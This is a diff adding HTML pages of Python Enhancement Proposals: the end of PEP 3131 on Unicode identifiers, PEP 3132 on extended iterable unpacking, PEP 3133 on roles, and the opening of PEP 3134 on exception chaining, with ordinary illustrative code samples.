Python code is written by many people in the world who are not +familiar with the English language, or even well-acquainted with the +Latin writing system. Such developers often desire to define classes +and functions with names in their native languages, rather than having +to come up with an (often incorrect) English translation of the +concept they want to name. By using identifiers in their native +language, they improve the clarity and maintainability of the code among +speakers of that language.

+

For some languages, common transliteration systems exist (in particular, for the +Latin-based writing systems). For other languages, users have greater +difficulty using Latin letters to write their native words.

+
+
+

Common Objections

+

Some objections are often raised against proposals similar to this one.

+

People claim that they will not be able to use a library if to do so they have +to use characters they cannot type on their keyboards. However, it is the +choice of the designer of the library to decide on various constraints for using +the library: people may not be able to use the library because they cannot get +physical access to the source code (because it is not published), or because +licensing prohibits usage, or because the documentation is in a language they +cannot understand. A developer wishing to make a library widely available needs +to make a number of explicit choices (such as publication, licensing, language +of documentation, and language of identifiers). It should always be the choice +of the author to make these decisions - not the choice of the language +designers.

+

In particular, projects wishing to have wide usage will probably want to +establish a policy that all identifiers, comments, and documentation are written +in English (see the GNU coding style guide for an example of such a policy). +Restricting the language to ASCII-only identifiers does not force comments and +documentation to be in English, or the identifiers actually to be English words, so +an additional policy is necessary anyway.

+
+
+

Specification of Language Changes

+

The syntax of identifiers in Python will be based on the Unicode standard annex +UAX-31 [1], with elaboration and changes as defined below.

+

Within the ASCII range (U+0001..U+007F), the valid characters for identifiers +are the same as in Python 2.5. This specification only introduces additional +characters from outside the ASCII range. For other characters, the +classification uses the version of the Unicode Character Database as included in +the unicodedata module.

+

The identifier syntax is <XID_Start> <XID_Continue>*.

+

The exact specification of what characters have the XID_Start or +XID_Continue properties can be found in the DerivedCoreProperties +file of the Unicode data in use by Python (4.1 at the time this +PEP was written), see [6]. For reference, the construction rules +for these sets are given below. The XID_* properties are derived +from ID_Start/ID_Continue, which are derived themselves.

+

ID_Start is defined as all characters having one of the general +categories uppercase letters (Lu), lowercase letters (Ll), titlecase +letters (Lt), modifier letters (Lm), other letters (Lo), letter +numbers (Nl), the underscore, and characters carrying the +Other_ID_Start property. XID_Start then closes this set under +normalization, by removing all characters whose NFKC normalization +is not of the form ID_Start ID_Continue* anymore.

+

ID_Continue is defined as all characters in ID_Start, plus +nonspacing marks (Mn), spacing combining marks (Mc), decimal number +(Nd), connector punctuations (Pc), and characters carrying the +Other_ID_Continue property. Again, XID_Continue closes this set +under NFKC-normalization; it also adds U+00B7 to support Catalan.

+

All identifiers are converted into the normal form NFKC while parsing; +comparison of identifiers is based on NFKC.
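
+

A minimal illustration with today's unicodedata module (the U+FB01 “fi” ligature is one compatibility character folded by NFKC):

+
import unicodedata
+
+# The ligature spelling and the plain spelling normalize to the same
+# string, so as identifiers they name the same variable:
+assert unicodedata.normalize("NFKC", "\ufb01le") == "file"
+
+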

+

A non-normative HTML file listing all valid identifier characters for +Unicode 4.1 can be found at +http://www.dcl.hpi.uni-potsdam.de/home/loewis/table-3131.html.

+
+
+

Policy Specification

+

As an addition to the Python Coding style, the following policy is +prescribed: All identifiers in the Python standard library MUST use +ASCII-only identifiers, and SHOULD use English words wherever feasible +(in many cases, abbreviations and technical terms are used which +aren’t English). In addition, string literals and comments must also +be in ASCII. The only exceptions are (a) test cases testing the +non-ASCII features, and (b) names of authors. Authors whose names are +not based on the Latin alphabet MUST provide a Latin transliteration +of their names.

+

As an option, this specification can be applied to Python 2.x. In +that case, ASCII-only identifiers would continue to be represented as +byte string objects in namespace dictionaries; identifiers with +non-ASCII characters would be represented as Unicode strings.

+
+
+

Implementation

+

The following changes will need to be made to the parser:

+
    +
  1. If a non-ASCII character is found in the UTF-8 representation of +the source code, a forward scan is made to find the first ASCII +non-identifier character (e.g. a space or punctuation character)
  2. +
  3. The entire UTF-8 string is passed to a function to normalize the +string to NFKC, and then verify that it follows the identifier +syntax. No such callout is made for pure-ASCII identifiers, which +continue to be parsed the way they are today. The Unicode database +must start including the Other_ID_{Start|Continue} property.
  4. +
  5. If this specification is implemented for 2.x, reflective libraries +(such as pydoc) must be verified to continue to work when Unicode +strings appear in __dict__ slots as keys.
  6. +
+
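
A rough sketch of the normalization-and-verification callout described in step 2 above (verify_identifier is a hypothetical helper; in today's Python 3, str.isidentifier() implements the <XID_Start> <XID_Continue>* check):

+
import unicodedata
+
+def verify_identifier(token):
+    # Normalize to NFKC, then check the identifier syntax.
+    normalized = unicodedata.normalize("NFKC", token)
+    return normalized.isidentifier()
+
+assert verify_identifier("\ufb01le")    # the 'fi' ligature folds to 'file'
+assert not verify_identifier("1abc")    # may not start with a digit
+
+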
+
+

Open Issues

+

John Nagle suggested consideration of Unicode Technical Standard #39, +[2], which discusses security mechanisms for Unicode identifiers. +It’s not clear how that can precisely apply to this PEP; possible +consequences are

+
    +
  • warn about characters listed as “restricted” in xidmodifications.txt
  • +
  • warn about identifiers using mixed scripts
  • +
  • somehow perform Confusable Detection
  • +
+

In the latter two approaches, it’s not clear how precisely the +algorithm should work. For mixed scripts, certain kinds of mixing +should probably be allowed - are these the “Common” and “Inherited” +scripts mentioned in section 5? For Confusable Detection, it seems one +needs two identifiers to compare them for confusion - is it possible +to somehow apply it to a single identifier only, and warn?

+

In follow-up discussion, it turns out that John Nagle actually +meant to suggest UTR#36, level “Highly Restrictive”, [3].

+

Several people suggested allowing and ignoring formatting control +characters (general category Cf), as is done in Java, JavaScript, and +C#. It’s not clear whether this would improve things (it might +for RTL languages); if there is a need, these can be added +later.

+

Some people would like to see an option on selecting support +for this PEP at run-time; opinions vary on what precisely +that option should be, and what precisely its default value +should be. Guido van Rossum commented in [5] that a global +flag passed to the interpreter is not acceptable, as it would +apply to all modules.

+
+
+

Discussion

+

Ka-Ping Yee summarizes the discussion and further objections +in [4] as follows:

+
    +
  1. Should identifiers be allowed to contain any Unicode letter?

    Drawbacks of allowing non-ASCII identifiers wholesale:

    +
      +
    1. Python will lose the ability to make a reliable round trip to +a human-readable display on screen or on paper.
    2. +
    3. Python will become vulnerable to a new class of security exploits; +code and submitted patches will be much harder to inspect.
    4. +
    5. Humans will no longer be able to validate Python syntax.
    6. +
    7. Unicode is young; its problems are not yet well understood and +solved; tool support is weak.
    8. +
    9. Languages with non-ASCII identifiers use different character sets +and normalization schemes; PEP 3131’s choices are non-obvious.
    10. +
    11. The Unicode bidi algorithm yields an extremely confusing display +order for RTL text when digits or operators are nearby.
    12. +
    +
  2. +
  3. Should the default behaviour accept only ASCII identifiers, or +should it accept identifiers containing non-ASCII characters?

    Arguments for ASCII only by default:

    +
      +
    1. Non-ASCII identifiers by default makes common practice/assumptions +subtly/unknowingly wrong; rarely wrong is worse than obviously wrong.
    2. +
    3. Better to raise a warning than to fail silently when encountering +a probably unexpected situation.
    4. +
    5. All of current usage is ASCII-only; the vast majority of future +usage will be ASCII-only.
    6. +
    +
      +
    1. It is the pockets of Unicode adoption that are parochial, not the +ASCII advocates.
    2. +
    3. Python should audit for ASCII-only identifiers for the same +reasons that it audits for tab-space consistency
    4. +
    5. Incremental change is safer.
    6. +
    7. An ASCII-only default favors open-source development and sharing +of source code.
    8. +
    9. Existing projects won’t have to waste any brainpower worrying +about the implications of Unicode identifiers.
    10. +
    +
  4. +
  5. Should non-ASCII identifiers be optional?

    Various voices in support of a flag (although there’s been debate +over which should be the default, no one seems to be saying that +there shouldn’t be an off switch)

    +
  6. +
  7. Should the identifier character set be configurable?

    Various voices proposing and supporting a selectable character set, +so that users can get all the benefits of using their own language +without the drawbacks of confusable/unfamiliar characters

    +
  8. +
  9. Which identifier characters should be allowed?
      +
    1. What to do about bidi format control characters?
    2. +
    3. What about other ID_Continue characters? What about characters +that look like punctuation? What about other recommendations +in UTS #39? What about mixed-script identifiers?
    4. +
    +
  10. +
  11. Which normalization form should be used, NFC or NFKC?
  12. +
  13. Should source code be required to be in normalized form?
  14. +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3131.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3132/index.html b/pep-3132/index.html new file mode 100644 index 00000000000..22858c9fa5d --- /dev/null +++ b/pep-3132/index.html @@ -0,0 +1,310 @@ + + + + + + + + PEP 3132 – Extended Iterable Unpacking | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3132 – Extended Iterable Unpacking

+
+
Author:
+
Georg Brandl <georg at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
30-Apr-2007
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a change to iterable unpacking syntax, allowing a +“catch-all” name to be specified which will be assigned a list of all items +not assigned to a “regular” name.

+

An example says more than a thousand words:

+
>>> a, *b, c = range(5)
+>>> a
+0
+>>> c
+4
+>>> b
+[1, 2, 3]
+
+
+
+
+

Rationale

+

Many algorithms require splitting a sequence into a “first, rest” pair. +With the new syntax,

+
first, rest = seq[0], seq[1:]
+
+
+

is replaced by the cleaner and probably more efficient:

+
first, *rest = seq
+
+
+

For more complex unpacking patterns, the new syntax looks even +cleaner, and the clumsy index handling is not necessary anymore.

+

Also, if the right-hand value is not a list, but an iterable, it +has to be converted to a list before it can be sliced; to +avoid creating this temporary list, one has to resort to

+
it = iter(seq)
+first = it.next()
+rest = list(it)
+
+
+
+
+

Specification

+

A tuple (or list) on the left side of a simple assignment (unpacking +is not defined for augmented assignment) may contain at most one +expression prepended with a single asterisk (which is henceforth +called a “starred” expression, while the other expressions in the +list are called “mandatory”). This designates a subexpression that +will be assigned a list of all items from the iterable being unpacked +that are not assigned to any of the mandatory expressions, or an +empty list if there are no such items.

+

For example, if seq is a sliceable sequence, all the following +assignments are equivalent if seq has at least two elements:

+
a, b, c = seq[0], list(seq[1:-1]), seq[-1]
+a, *b, c = seq
+[a, *b, c] = seq
+
+
+

It is an error (as it is currently) if the iterable doesn’t contain +enough items to assign to all the mandatory expressions.
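
+

For example (the exact message wording varies across Python versions):

+
>>> a, *b, c = [1]
+Traceback (most recent call last):
+  ...
+ValueError: not enough values to unpack (expected at least 2, got 1)
+
+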

+

It is also an error to use the starred expression as a lone +assignment target, as in

+
*a = range(5)
+
+
+

This, however, is valid syntax:

+
*a, = range(5)
+
+
+

Note that this proposal also applies to tuples in implicit assignment +context, such as in a for statement:

+
for a, *b in [(1, 2, 3), (4, 5, 6, 7)]:
+    print(b)
+
+
+

would print out

+
[2, 3]
+[5, 6, 7]
+
+
+

Starred expressions are only allowed as assignment targets, using them +anywhere else (except for star-args in function calls, of course) is an +error.

+
+
+

Implementation

+
+

Grammar change

+

This feature requires a new grammar rule:

+
star_expr: ['*'] expr
+
+
+

In these two rules, expr is changed to star_expr:

+
comparison: star_expr (comp_op star_expr)*
+exprlist: star_expr (',' star_expr)* [',']
+
+
+
+
+

Changes to the Compiler

+

A new ASDL expression type Starred is added which represents a +starred expression. Note that the starred expression element +introduced here is universal and could later be used for other +purposes in non-assignment context, such as the yield *iterable +proposal.

+

The compiler is changed to recognize all cases where a starred +expression is invalid and flag them with syntax errors.

+

A new bytecode instruction, UNPACK_EX, is added, whose argument +has the number of mandatory targets before the starred target in the +lower 8 bits and the number of mandatory targets after the starred +target in the upper 8 bits. For unpacking sequences without starred +expressions, the old UNPACK_ITERABLE opcode is kept.
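
+

This encoding can be observed with the dis module on a modern CPython: for a, *b, c there is one mandatory target on each side of the star, so the argument is 1 + (1 << 8) = 257 (listing abridged; details vary by version):

+
import dis
+
+dis.dis(compile("a, *b, c = seq", "<demo>", "exec"))
+# ...
+#               UNPACK_EX               257
+# ...
+
+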

+
+
+

Changes to the Bytecode Interpreter

+

The function unpack_iterable() in ceval.c is changed to handle +the extended unpacking, via an argcntafter parameter. In the +UNPACK_EX case, the function will do the following:

+
    +
  • collect all items for mandatory targets before the starred one
  • +
  • collect all remaining items from the iterable in a list
  • +
  • pop items for mandatory targets after the starred one from the list
  • +
  • push the single items and the resized list on the stack
  • +
+

Shortcuts for unpacking iterables of known types, such as lists or +tuples, can be added.

+

The current implementation can be found at the SourceForge Patch +tracker [SFPATCH]. It now includes a minimal test case.

+
+
+
+

Acceptance

+

After a short discussion on the python-3000 list [1], the PEP was +accepted by Guido in its current form. Possible changes discussed +were:

+
    +
  • Only allow a starred expression as the last item in the exprlist. +This would simplify the unpacking code a bit and allow for the +starred expression to be assigned an iterator. This behavior was +rejected because it would be too surprising.
  • +
  • Try to give the starred target the same type as the source +iterable, for example, b in a, *b = 'hello' would be +assigned the string 'ello'. This may seem nice, but is +impossible to get right consistently with all iterables.
  • +
  • Make the starred target a tuple instead of a list. This would be +consistent with a function’s *args, but make further processing +of the result harder.
  • +
+
+
+

References

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3132.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3133/index.html b/pep-3133/index.html new file mode 100644 index 00000000000..6eeb65f6bbf --- /dev/null +++ b/pep-3133/index.html @@ -0,0 +1,682 @@ + + + + + + + + PEP 3133 – Introducing Roles | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3133 – Introducing Roles

+
+
Author:
+
Collin Winter <collinwinter at google.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Requires:
+
3115, 3129
+
Created:
+
01-May-2007
+
Python-Version:
+
3.0
+
Post-History:
+
13-May-2007
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP has helped push PEP 3119 towards a saner, more minimalistic +approach. But given the latest version of PEP 3119 I much prefer +that. GvR.

+
+
+

Abstract

+

Python’s existing object model organizes objects according to their +implementation. It is often desirable – especially in a +duck-typing-based language like Python – to organize objects by +the part they play in a larger system (their intent), rather than by +how they fulfill that part (their implementation). This PEP +introduces the concept of roles, a mechanism for organizing +objects according to their intent rather than their implementation.

+
+
+

Rationale

+

In the beginning were objects. They allowed programmers to marry +function and state, and to increase code reusability through concepts +like polymorphism and inheritance, and lo, it was good. There came +a time, however, when inheritance and polymorphism weren’t enough. +With the invention of both dogs and trees, we were no longer able to +be content with knowing merely, “Does it understand ‘bark’?” +We now needed to know what a given object thought that “bark” meant.

+

One solution, the one detailed here, is that of roles, a mechanism +orthogonal and complementary to the traditional class/instance system. +Whereas classes concern themselves with state and implementation, the +roles mechanism deals exclusively with the behaviours embodied in a +given class.

+

This system was originally called “traits” and implemented for Squeak +Smalltalk [4]. It has since been adapted for use in +Perl 6 [3] where it is called “roles”, and it is primarily +from there that the concept is now being interpreted for Python 3. +Python 3 will preserve the name “roles”.

+

In a nutshell: roles tell you what an object does, classes tell you +how an object does it.

+

In this PEP, I will outline a system for Python 3 that will make it +possible to easily determine whether a given object’s understanding +of “bark” is tree-like or dog-like. (There might also be more +serious examples.)

+
+

A Note on Syntax

+

The syntax proposals in this PEP are tentative and should be +considered strawmen. The necessary bits that this PEP depends +on – namely PEP 3115’s class definition syntax and PEP 3129’s class +decorators – are still being formalized and may change. Function +names will, of course, be subject to lengthy bikeshedding debates.

+
+
+
+

Performing Your Role

+
+

Static Role Assignment

+

Let’s start out by defining Tree and Dog classes

+
class Tree(Vegetable):
+
+  def bark(self):
+    return self.is_rough()
+
+
+class Dog(Animal):
+
+  def bark(self):
+    return self.goes_ruff()
+
+
+

While both implement a bark() method with the same signature, +they do wildly different things. We need some way of differentiating +what we’re expecting. Relying on inheritance and a simple +isinstance() test will limit code reuse and/or force any dog-like +classes to inherit from Dog, whether or not that makes sense. +Let’s see if roles can help.

+
@perform_role(Doglike)
+class Dog(Animal):
+  ...
+
+@perform_role(Treelike)
+class Tree(Vegetable):
+  ...
+
+@perform_role(SitThere)
+class Rock(Mineral):
+  ...
+
+
+

We use class decorators from PEP 3129 to associate a particular role +or roles with a class. Client code can now verify that an incoming +object performs the Doglike role, allowing it to handle Wolf, +LaughingHyena and Aibo [1] instances, too.

+

Roles can be composed via normal inheritance:

+
@perform_role(Guard, MummysLittleDarling)
+class GermanShepherd(Dog):
+
+  def guard(self, the_precious):
+    while True:
+      if intruder_near(the_precious):
+        self.growl()
+
+  def get_petted(self):
+    self.swallow_pride()
+
+
+

Here, GermanShepherd instances perform three roles: Guard and +MummysLittleDarling are applied directly, whereas Doglike +is inherited from Dog.

+
+
+

Assigning Roles at Runtime

+

Roles can be assigned at runtime, too, by unpacking the syntactic +sugar provided by decorators.

+

Say we import a Robot class from another module, and since we +know that Robot already implements our Guard interface, +we’d like it to play nicely with guard-related code, too.

+
>>> perform(Guard)(Robot)
+
+
+

This takes effect immediately and impacts all instances of Robot.

+
+
+

Asking Questions About Roles

+

Just because we’ve told our robot army that they’re guards, we’d +like to check in on them occasionally and make sure they’re still at +their task.

+
>>> performs(our_robot, Guard)
+True
+
+
+

What about that one robot over there?

+
>>> performs(that_robot_over_there, Guard)
+True
+
+
+

The performs() function is used to ask if a given object +fulfills a given role. It cannot be used, however, to ask a +class if its instances fulfill a role:

+
>>> performs(Robot, Guard)
+False
+
+
+

This is because the Robot class is not interchangeable +with a Robot instance.

+
+
+
+

Defining New Roles

+
+

Empty Roles

+

Roles are defined like a normal class, but use the Role +metaclass.

+
class Doglike(metaclass=Role):
+  ...
+
+
+

Metaclasses are used to indicate that Doglike is a Role in +the same way 5 is an int and tuple is a type.

+
+
+

Composing Roles via Inheritance

+

Roles may inherit from other roles; this has the effect of composing +them. Here, instances of Dog will perform both the +Doglike and FourLegs roles.

+
class FourLegs(metaclass=Role):
+  pass
+
+class Doglike(FourLegs, Carnivore):
+  pass
+
+@perform_role(Doglike)
+class Dog(Mammal):
+  pass
+
+
+
+
+

Requiring Concrete Methods

+

So far we’ve only defined empty roles – not very useful things. +Let’s now require that all classes that claim to fulfill the +Doglike role define a bark() method:

+
class Doglike(FourLegs):
+
+  def bark(self):
+    pass
+
+
+

No decorators are required to flag the method as “abstract”, and the +method will never be called, meaning whatever code it contains (if any) +is irrelevant. Roles provide only abstract methods; concrete +default implementations are left to other, better-suited mechanisms +like mixins.

+

Once you have defined a role, and a class has claimed to perform that +role, it is essential that that claim be verified. Here, the +programmer has misspelled one of the methods required by the role.

+
@perform_role(FourLegs)
+class Horse(Mammal):
+
+  def run_like_teh_wind(self):
+    ...
+
+
+

This will cause the role system to raise an exception, complaining +that you’re missing a run_like_the_wind() method. The role +system carries out these checks as soon as a class is flagged as +performing a given role.

+

Concrete methods are required to match exactly the signature demanded +by the role. Here, we’ve attempted to fulfill our role by defining a +concrete version of bark(), but we’ve missed the mark a bit.

+
@perform_role(Doglike)
+class Coyote(Mammal):
+
+  def bark(self, target=moon):
+    pass
+
+
+

This method’s signature doesn’t match exactly with what the +Doglike role was expecting, so the role system will throw a bit +of a tantrum.

+
+
+
+

Mechanism

+

The following are strawman proposals for how roles might be expressed +in Python. The examples here are phrased in a way that the roles +mechanism may be implemented without changing the Python interpreter. +(Examples adapted from an article on Perl 6 roles by Curtis Poe +[2].)

+
    +
  1. Static class role assignment
    @perform_role(Thieving)
    +class Elf(Character):
    +  ...
    +
    +
    +

    perform_role() accepts multiple arguments, such that this is +also legal:

    +
    @perform_role(Thieving, Spying, Archer)
    +class Elf(Character):
    +  ...
    +
    +
    +

The Elf class now performs the Thieving, Spying, +and Archer roles.

    +
  2. +
  3. Querying instances
    if performs(my_elf, Thieving):
    +  ...
    +
    +
    +

    The second argument to performs() may also be anything with a +__contains__() method, meaning the following is legal:

    +
    if performs(my_elf, set([Thieving, Spying, BoyScout])):
    +  ...
    +
    +
    +

    Like isinstance(), the object needs only to perform a single +role out of the set in order for the expression to be true.

    +
  4. +
+
+
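
A minimal pure-Python sketch of this strawman API (the __roles__ attribute is an assumed implementation detail, and the required-method checks described earlier are omitted):

+
class Role(type):
+    """Metaclass marking a class as a role."""
+
+def perform_role(*roles):
+    def decorate(cls):
+        # Record the roles directly on the class; a full version
+        # would also verify required methods and signatures here.
+        cls.__roles__ = getattr(cls, "__roles__", frozenset()) | set(roles)
+        return cls
+    return decorate
+
+def performs(obj, role):
+    # Collect roles declared anywhere in the class's MRO.
+    performed = set()
+    for klass in type(obj).__mro__:
+        performed |= klass.__dict__.get("__roles__", set())
+    if isinstance(role, type):                 # a single role
+        return role in performed
+    return any(r in role for r in performed)   # anything with __contains__
+
+class Doglike(metaclass=Role):
+    pass
+
+@perform_role(Doglike)
+class Dog:
+    pass
+
+assert performs(Dog(), Doglike)
+assert not performs(Dog, Doglike)   # a class is not its instances
+
+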
+

Relationship to Abstract Base Classes

+

Early drafts of this PEP [5] envisioned roles as competing +with the abstract base classes proposed in PEP 3119. After further +discussion and deliberation, a compromise and a delegation of +responsibilities and use-cases has been worked out as follows:

+
    +
  • Roles provide a way of indicating an object’s semantics and abstract +capabilities. A role may define abstract methods, but only as a +way of delineating an interface through which a particular set of +semantics are accessed. An Ordering role might require that +some set of ordering operators be defined.
    class Ordering(metaclass=Role):
    +  def __ge__(self, other):
    +    pass
    +
    +  def __le__(self, other):
    +    pass
    +
    +  def __ne__(self, other):
    +    pass
    +
    +  # ...and so on
    +
    +
    +

    In this way, we’re able to indicate an object’s role or function +within a larger system without constraining or concerning ourselves +with a particular implementation.

    +
  • +
  • Abstract base classes, by contrast, are a way of reusing common, +discrete units of implementation. For example, one might define an +OrderingMixin that implements several ordering operators in +terms of other operators.
    class OrderingMixin:
    +  def __ge__(self, other):
    +    return self > other or self == other
    +
    +  def __le__(self, other):
    +    return self < other or self == other
    +
    +  def __ne__(self, other):
    +    return not self == other
    +
    +  # ...and so on
    +
    +
    +

    Using this abstract base class - more properly, a concrete +mixin - allows a programmer to define a limited set of operators +and let the mixin in effect “derive” the others.

    +
  • +
+

By combining these two orthogonal systems, we’re able to both +a) provide functionality, and b) alert consumer systems to the +presence and availability of this functionality. For example, +since the OrderingMixin class above satisfies the interface +and semantics expressed in the Ordering role, we say the mixin +performs the role:

+
@perform_role(Ordering)
+class OrderingMixin:
+  def __ge__(self, other):
+    return self > other or self == other
+
+  def __le__(self, other):
+    return self < other or self == other
+
+  def __ne__(self, other):
+    return not self == other
+
+  # ...and so on
+
+
+

Now, any class that uses the mixin will automatically – that is, +without further programmer effort – be tagged as performing the +Ordering role.

+

The separation of concerns into two distinct, orthogonal systems +is desirable because it allows us to use each one separately. +Take, for example, a third-party package providing a +RecursiveHash role that indicates a container takes its +contents into account when determining its hash value. Since +Python’s built-in tuple and frozenset classes follow this +semantic, the RecursiveHash role can be applied to them.

+
>>> perform_role(RecursiveHash)(tuple)
+>>> perform_role(RecursiveHash)(frozenset)
+
+
+

Any code that consumes RecursiveHash objects will now be +able to consume tuples and frozensets.

+
+
+

Open Issues

+
+

Allowing Instances to Perform Different Roles Than Their Class

+

Perl 6 allows instances to perform different roles than their class. +These changes are local to the single instance and do not affect +other instances of the class. For example:

+
my_elf = Elf()
+my_elf.goes_on_quest()
+my_elf.becomes_evil()
+now_performs(my_elf, Thieving) # Only this one elf is a thief
+my_elf.steals(["purses", "candy", "kisses"])
+
+
+

In Perl 6, this is done by creating an anonymous class that +inherits from the instance’s original parent and performs the +additional role(s). This is possible in Python 3, though whether it +is desirable is another matter.

+

Inclusion of this feature would, of course, make it much easier to +express the works of Charles Dickens in Python:

+
>>> from literature import role, BildungsRoman
+>>> from dickens import Urchin, Gentleman
+>>>
+>>> with BildungsRoman() as OliverTwist:
+...   mr_brownlow = Gentleman()
+...   oliver, artful_dodger = Urchin(), Urchin()
+...   now_performs(artful_dodger, [role.Thief, role.Scoundrel])
+...
+...   oliver.has_adventures_with(artful_dodger)
+...   mr_brownlow.adopt_orphan(oliver)
+...   now_performs(oliver, role.RichWard)
+
+
+
+
+

Requiring Attributes

+

Neal Norwitz has requested the ability to make assertions about +the presence of attributes using the same mechanism used to require +methods. Since roles take effect at class definition-time, and +since the vast majority of attributes are defined at runtime by a +class’s __init__() method, there doesn’t seem to be a good way +to check for attributes at the same time as methods.

+

It may still be desirable to include non-enforced attributes in the +role definition, if only for documentation purposes.

+
+
+

Roles of Roles

+

Under the proposed semantics, it is possible for roles to +have roles of their own.

+
@perform_role(Y)
+class X(metaclass=Role):
+  ...
+
+
+

While this is possible, it is meaningless, since roles +are generally not instantiated. There has been some +off-line discussion about giving meaning to this expression, but so +far no good ideas have emerged.

+
+
+

class_performs()

+

It is currently not possible to ask a class if its instances perform +a given role. It may be desirable to provide an analogue to +performs() such that

+
>>> isinstance(my_dwarf, Dwarf)
+True
+>>> performs(my_dwarf, Surly)
+True
+>>> performs(Dwarf, Surly)
+False
+>>> class_performs(Dwarf, Surly)
+True
+
+
+
+
+

Prettier Dynamic Role Assignment

+

An early draft of this PEP included a separate mechanism for +dynamically assigning a role to a class. This was spelled

+
>>> now_perform(Dwarf, GoldMiner)
+
+
+

This same functionality already exists by unpacking the syntactic +sugar provided by decorators:

+
>>> perform_role(GoldMiner)(Dwarf)
+
+
+

At issue is whether dynamic role assignment is sufficiently important +to warrant a dedicated spelling.

+
+
+

Syntax Support

+

Though the phrasings laid out in this PEP are designed so that the +roles system could be shipped as a stand-alone package, it may be +desirable to add special syntax for defining, assigning and +querying roles. One example might be a role keyword, which would +translate

+
class MyRole(metaclass=Role):
+  ...
+
+
+

into

+
role MyRole:
+  ...
+
+
+

Assigning a role could take advantage of the class definition +arguments proposed in PEP 3115:

+
class MyClass(performs=MyRole):
+  ...
+
+
+
+
+
+

Implementation

+

A reference implementation is forthcoming.

+
+
+

Acknowledgements

+

Thanks to Jeffery Yasskin, Talin and Guido van Rossum for several +hours of in-person discussion to iron out the differences, overlap +and finer points of roles and abstract base classes.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3133.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3134/index.html b/pep-3134/index.html new file mode 100644 index 00000000000..0a1d0ec7335 --- /dev/null +++ b/pep-3134/index.html @@ -0,0 +1,659 @@ + + + + + + + + PEP 3134 – Exception Chaining and Embedded Tracebacks | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3134 – Exception Chaining and Embedded Tracebacks

+
+
Author:
+
Ka-Ping Yee
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-May-2005
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Numbering Note

+

This PEP started its life as PEP 344. Since it is now targeted for Python +3000, it has been moved into the 3xxx space.

+
+
+

Abstract

+

This PEP proposes three standard attributes on exception instances: the +__context__ attribute for implicitly chained exceptions, the __cause__ +attribute for explicitly chained exceptions, and the __traceback__ +attribute for the traceback. A new raise ... from statement sets the +__cause__ attribute.

+
+
+

Motivation

+

During the handling of one exception (exception A), it is possible that another +exception (exception B) may occur. In today’s Python (version 2.4), if this +happens, exception B is propagated outward and exception A is lost. In order +to debug the problem, it is useful to know about both exceptions. The +__context__ attribute retains this information automatically.

+

Sometimes it can be useful for an exception handler to intentionally re-raise +an exception, either to provide extra information or to translate an exception +to another type. The __cause__ attribute provides an explicit way to +record the direct cause of an exception.

+

In today’s Python implementation, exceptions are composed of three parts: the +type, the value, and the traceback. The sys module exposes the current +exception in three parallel variables, exc_type, exc_value, and +exc_traceback; the sys.exc_info() function returns a tuple of these +three parts; and the raise statement has a three-argument form accepting +these three parts.

+
+
+

History

+

Raymond Hettinger [1] raised the issue of masked exceptions on Python-Dev in +January 2003 and proposed a PyErr_FormatAppend() function that C modules +could use to augment the currently active exception with more information. +Brett Cannon [2] brought up chained exceptions again in June 2003, prompting +a long discussion.

+

Greg Ewing [3] identified the case of an exception occurring in a finally +block during unwinding triggered by an original exception, as distinct from +the case of an exception occurring in an except block that is handling the +original exception.

+

Greg Ewing [4] and Guido van Rossum [5], and probably others, have +previously mentioned adding a traceback attribute to Exception instances. +This is noted in PEP 3000.

+

This PEP was motivated by yet another recent Python-Dev reposting of the same +ideas [6] [7].

+
+
+

Rationale

+

The Python-Dev discussions revealed interest in exception chaining for two +quite different purposes. To handle the unexpected raising of a secondary +exception, the exception must be retained implicitly. To support intentional +translation of an exception, there must be a way to chain exceptions +explicitly. This PEP addresses both.

+

Several attribute names for chained exceptions have been suggested on +Python-Dev [2], including cause, antecedent, reason, original, +chain, chainedexc, exc_chain, excprev, previous, and +precursor. For an explicitly chained exception, this PEP suggests +__cause__ because of its specific meaning. For an implicitly chained +exception, this PEP proposes the name __context__ because the intended +meaning is more specific than temporal precedence but less specific than +causation: an exception occurs in the context of handling another exception.

+

This PEP suggests names with leading and trailing double-underscores for these +three attributes because they are set by the Python VM. Only in very special +cases should they be set by normal assignment.

+

This PEP handles exceptions that occur during except blocks and finally +blocks in the same way. Reading the traceback makes it clear where the +exceptions occurred, so additional mechanisms for distinguishing the two cases +would only add unnecessary complexity.

+

This PEP proposes that the outermost exception object (the one exposed for +matching by except clauses) be the most recently raised exception for +compatibility with current behaviour.

+

This PEP proposes that tracebacks display the outermost exception last, because +this would be consistent with the chronological order of tracebacks (from +oldest to most recent frame) and because the actual thrown exception is easier +to find on the last line.

+

To keep things simpler, the C API calls for setting an exception will not +automatically set the exception’s __context__. Guido van Rossum has +expressed concerns with making such changes [8].

+

